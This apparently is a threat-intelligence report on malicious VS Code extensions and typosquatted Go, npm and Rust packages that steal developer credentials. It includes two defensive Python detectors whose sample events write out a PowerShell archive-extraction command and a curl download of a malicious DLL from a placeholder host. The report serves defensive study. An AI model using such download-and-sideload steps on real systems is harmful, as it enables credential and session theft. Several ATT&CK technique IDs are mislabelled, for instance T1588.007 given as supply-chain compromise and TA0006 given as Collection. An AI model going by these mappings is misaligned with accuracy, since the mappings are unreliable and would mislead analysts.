Full Report
Cybersecurity researchers have discovered two new extensions on Microsoft Visual Studio Code (VS Code) Marketplace that are designed to infect developer machines with stealer malware. The VS Code extensions masquerade as a premium dark theme and an artificial intelligence (AI)-powered coding assistant, but, in actuality, harbor covert functionality to download additional payloads, take
Analysis Summary
# Tool/Technique: Malicious VS Code Extensions (BigBlack.bitcoin-black, BigBlack.codo-ai)
## Overview
Two malicious extensions were discovered on the Microsoft Visual Studio Code (VS Code) Marketplace masquerading as benign developer utilities (a dark theme and an AI coding assistant). Their primary purpose is to download and execute secondary malicious payloads to steal sensitive developer data, including credentials, clipboard contents, and session data.
## Technical Details
- Type: Malware/Loader (via Ecosystem Compromise)
- Platform: Windows (utilizes PowerShell)
- Capabilities: Payload download/extraction, credential theft, process listing, screenshot capture, data exfiltration.
- First Seen: December 2025 (based on removal dates)
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1588.007 - Obtain Capabilities: Acquire Infrastructure: Compromise Software Supply Chain
- TA0002 - Execution
- T1059.001 - Command and Scripting Interpreter: PowerShell
- TA0005 - Defense Evasion
- T1218 - Signed Binary Proxy Execution (via DLL Hijacking)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
- TA0006 - Credential Access
- T1115 - Clipboard Data
- T1140 - Deobfuscate/Decode Files or Information
- T1003 - OS Credential Dumping (Implied via Wi-Fi password theft)
- TA0006 - Collection
- T1005 - Data from Local System (Wi-Fi credentials, App lists, Process lists)
- T1113 - Screen Capture
## Functionality
### Core Capabilities
* **Masquerading:** Posing as "BigBlack.bitcoin-black" (dark theme) and "BigBlack.codo-ai" (AI assistant).
* **Initial Payload Stage:** Executing a PowerShell script to download a password-protected ZIP archive from an external server.
* **Payload Extraction:** Using multiple methods to extract the main payload, including native `Expand-Archive`, .NET libraries, DotNetZip, and 7-Zip. *Note: the visible error handling suggests early versions were noisy.*
* **Streamlined Execution:** Later versions switched, for easier evasion, to a batch script that uses `curl` to download an executable and a malicious DLL.
### Advanced Features
* **DLL Hijacking:** Loading the malicious `Lightshot.dll` via the legitimate Lightshot binary (`Lightshot.exe`) for execution under a trusted process context.
* **Data Harvesting:**
  * Gathering contents of the clipboard.
  * Collecting a list of installed applications and running processes.
  * Taking desktop screenshots.
  * Stealing stored Wi-Fi credentials.
  * Harvesting detailed system information.
* **Session Hijacking:** Launching Google Chrome and Microsoft Edge in headless mode to steal stored browser cookies and hijack user sessions.
## Indicators of Compromise
- File Hashes: N/A (Not provided in text)
- File Names: `Lightshot.dll` (malicious DLL), `Lightshot.exe` (legitimate Lightshot binary abused for the hijack).
- Registry Keys: N/A
- Network Indicators: `syn1112223334445556667778889990[.]org` (Defanged C2 for initial payload download)
- Behavioral Indicators: Visible PowerShell window (indicative of older version), Spawning `curl` process (newer version), Fileless execution utilizing legitimate signed binaries for code execution.
## Associated Threat Actors
The publisher name "BigBlack" and associated package names suggest a single, coordinated campaign, but specific established threat actor attribution (e.g., APT group) is not detailed in the text.
## Detection Methods
- Signature-based detection: Signatures against the ZIP archive password or known C2 domains (if observed post-removal).
- Behavioral detection: Monitoring VS Code extensions for unusual outbound network connections to external domains, use of `Expand-Archive` on non-standard archives, or the spawning of `curl` or PowerShell in connection with extension activation hooks; detection of the DLL hijacking pattern involving the Lightshot binary.
- YARA rules: Could be developed for known strings or structural elements within the extracted secondary payload.
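The behavioral indicators listed above (editor spawning PowerShell or `curl` from an activation hook, archive extraction in a user-writable folder, the `Lightshot.exe`/`Lightshot.dll` pairing, headless Chrome/Edge launched by a non-browser parent) as a small detection routine over constructed Sysmon-style events. This is an added example, not code from the report; the paths, field names and payload URL are assumptions.

```python
import ntpath  # handles Windows paths regardless of the host OS

EDITORS = {"code.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe"}
BROWSERS = {"chrome.exe", "msedge.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\")

def _base(path):
    return ntpath.basename(path).lower()

def classify(ev):
    """Return the alert labels that apply to one event ([] means benign)."""
    alerts = []
    if ev["type"] == "process_create":
        parent, image = _base(ev["ParentImage"]), _base(ev["Image"])
        cmd = ev.get("CommandLine", "").lower()
        # An activation hook runs in the extension host, so its downloader has the editor as parent.
        if parent in EDITORS and image in INTERPRETERS:
            alerts.append("editor_spawned_interpreter")
        if "expand-archive" in cmd and any(p in cmd for p in USER_WRITABLE):
            alerts.append("archive_extract_in_user_dir")
        # Headless Chrome/Edge from a non-browser parent matches the cookie theft step.
        if image in BROWSERS and "--headless" in cmd and parent not in BROWSERS:
            alerts.append("headless_browser_from_non_browser")
    elif ev["type"] == "image_load":
        # Genuine Lightshot loads a signed DLL from its install dir; the hijack pairs
        # the signed exe with an unsigned Lightshot.dll dropped in a writable folder.
        if _base(ev["Image"]) == "lightshot.exe" and _base(ev["ImageLoaded"]) == "lightshot.dll":
            writable = any(p in ev["Image"].lower() for p in USER_WRITABLE)
            if writable or ev.get("Signed", "false").lower() != "true":
                alerts.append("lightshot_dll_hijack")
    return alerts

def detect(events):
    return [classify(ev) for ev in events]  # aligned index-for-index with the input

# Constructed records shaped like Sysmon process-create (ID 1) and image-load (ID 7)
# events; the paths and the payload URL are placeholders, not real indicators.
CODE = r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe"
TEMP = r"C:\Users\dev\AppData\Local\Temp"
SAMPLE_EVENTS = [  # 0-3: the loader chain; 4-5: benign activity
    {"type": "process_create", "ParentImage": CODE, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Expand-Archive " + TEMP + r"\pkg.zip"},
    {"type": "process_create", "ParentImage": CODE, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -sL -o " + TEMP + r"\Lightshot.dll https://payload.invalid/x"},
    {"type": "image_load", "Image": TEMP + r"\Lightshot.exe", "ImageLoaded": TEMP + r"\Lightshot.dll", "Signed": "false"},
    {"type": "process_create", "ParentImage": TEMP + r"\Lightshot.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "CommandLine": "chrome.exe --headless=new"},
    {"type": "process_create", "ParentImage": r"C:\Windows\explorer.exe", "Image": CODE, "CommandLine": "Code.exe"},
    {"type": "image_load", "Image": r"C:\Program Files\Lightshot\Lightshot.exe",
     "ImageLoaded": r"C:\Program Files\Lightshot\Lightshot.dll", "Signed": "true"},
]
```

Each rule keys on the relationship between processes or between a loader and its DLL rather than on hashes, so it still fires when the payload is rebuilt.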
## Mitigation Strategies
- **Publisher Restrictions:** Restrict installation of extensions from untrusted or unknown publishers on developer workstations.
- **Principle of Least Privilege:** Developers should not run under highly privileged accounts, limiting the impact of credential theft.
- **Application Allowlisting:** Restricting execution of unauthorized executables or scripts (like the downloaded stage payloads).
- **Monitor Marketplace Security:** Reviewing newly published extensions for potential signs of low quality, low install count, and generic/misleading names.
- **Network Monitoring:** Blocking or logging traffic to known malicious infrastructure used for payload delivery.
## Related Tools/Techniques
* **Ecosystem Compromise:** Similar to the mentioned malicious Go, npm, and Rust packages found exploiting software supply chains.
* **DLL Side-Loading/Hijacking:** A technique used here to achieve execution via a trusted binary (`Lightshot`).
* **Stealer Malware:** The ultimate goal is data exfiltration, consistent with common infostealer operations.
---
# Tool/Technique: Malicious Go, NPM, and Rust Packages (Supply Chain)
## Overview
This refers to a broader set of malicious packages discovered across multiple developer ecosystems (Go, npm, Rust) designed to steal sensitive data by impersonating legitimate, trusted libraries.
## Technical Details
- Type: Malware/Loader (Ecosystem Implant)
- Platform: Go, Node.js (npm), Rust environments.
- Capabilities: Data exfiltration, reverse shell execution, credential harvesting.
- First Seen: Go packages noted as active since 2021.
## MITRE ATT&CK Mapping
*Identified techniques across the various packages:*
- T1588.006 - Supply Chain Compromise (General)
- T1048 - Exfiltration Over Alternative Protocol (If reverse shell is used)
- T1071.001 - Application Layer Protocol: Web Protocols (for exfiltration endpoints)
## Functionality
### Core Capabilities
* **Go Packages (`uuid` typosquatting):** Typosquatting legitimate libraries (`github[.]com/google/uuid`, `github[.]com/pborman/uuid`) using similar names (`github[.]com/bpoorman/uuid`, `github[.]com/bpoorman/uid`). Exfiltration is triggered when the application calls a helper function named "valid" with specific data.
* **NPM Packages (`elf-stats-*`):** A family of 420 unique packages designed to execute a reverse shell and exfiltrate files to a Pipedream endpoint.
* **Rust Crate (`finch-rust`):** Impersonates the "finch" library. It acts as a malware loader containing legitimate code plus a single malicious line to execute a secondary payload (`sha-rust`) when the developer uses the library's sketch serialization functionality.
### Advanced Features
* **Targeted Execution:** The Rust loader's malicious execution is tied to a specific, unique function call ("sketch serialization"), potentially aiming for stealth.
* **Reverse Shell Capability:** The npm packages included the capability to establish an interactive reverse shell.
## Indicators of Compromise
- File Hashes: N/A
- File Names: `elf-stats-*` (npm family), `sha-rust` (Rust payload).
- Registry Keys: N/A
- Network Indicators: dpaste site (for Go package data), Pipedream endpoint (for npm exfiltration).
- Behavioral Indicators: Network connections to Pipedream or dpaste sites initiated by Go, npm, or Rust application processes.
## Associated Threat Actors
* The npm package set is associated with a "likely French-speaking threat actor."
* No specific actor attribution provided for the Go or Rust implants beyond the publisher names.
## Detection Methods
- **Dependency Scanning:** Utilizing Software Composition Analysis (SCA) tools to detect known malicious package names or suspicious behavior triggered by function calls (e.g., dependency on `dpaste` endpoints).
- **Network Inspection:** Identifying outbound connections from development tools/compilers to known paste sites or non-standard exfiltration endpoints like Pipedream.
- **Code Review:** For highly critical projects, manual review of imported source code, especially looking for unexpected use of file serialization methods (Rust).
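The typosquatting described under Core Capabilities (`bpoorman/uuid` and `bpoorman/uid` for `pborman/uuid`, `finch-rust` for `finch`) and the dependency-scanning check above, as a near-miss detector over a constructed dependency list. This is an added example, not the report's or any SCA vendor's code; the trusted set, suffix list and distance limit are assumptions.

```python
# Added example: near-miss check over dependency names from a constructed manifest.
SUFFIXES = ("-rust", "-rs", "-js", "-node", "-go", "-py")  # assumed language suffixes

def osa_distance(a, b):
    """Optimal string alignment distance: Levenshtein plus adjacent swaps,
    so the 'bp' <-> 'pb' swap in bpoorman/pborman costs 1, not 2."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]

def lookalike(candidate, trusted, max_dist=2):
    """Return the trusted name `candidate` imitates, or None if exact or unrelated.

    Names are compared segment by segment ('/'-separated, as in Go module paths):
    github.com/bpoorman/uid is judged on bpoorman~pborman (2) and uid~uuid (1).
    A trusted name plus a language suffix (finch-rust for finch) is flagged too."""
    name = candidate.lower()
    if name in trusted:
        return None
    for t in trusted:
        if any(name == t + suf for suf in SUFFIXES):
            return t
        cs, ts = name.split("/"), t.split("/")
        if len(cs) == len(ts) and all(osa_distance(x, y) <= max_dist for x, y in zip(cs, ts)):
            return t
    return None

def scan(deps, trusted):
    """Map each suspicious dependency to the trusted name it resembles."""
    hits = {}
    for dep in deps:
        t = lookalike(dep, trusted)
        if t:
            hits[dep] = t
    return hits

TRUSTED = {"github.com/google/uuid", "github.com/pborman/uuid", "finch", "serde"}
DEPS = ["github.com/google/uuid", "github.com/bpoorman/uuid", "github.com/bpoorman/uid",
        "finch-rust", "serde", "elf-stats-17"]  # constructed manifest contents
```

The near-miss rule does not cover the `elf-stats-*` family, whose names imitate nothing; that pattern needs publisher-level signals such as one account pushing hundreds of near-identical packages.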
## Mitigation Strategies
* **Repository Pinning:** Pin dependencies to specific, verified versions rather than broad version ranges or dynamic version specifiers.
* **SCA Tooling:** Implement strict SCA policies across the SDLC, focusing on detecting typosquatting and suspicious network calls post-build.
* **Credential Monitoring:** Ensure development environment secrets are not accessible during standard library execution flows.
## Related Tools/Techniques
* Ecosystem-specific dependency confusion or typosquatting attacks targeting various language package managers.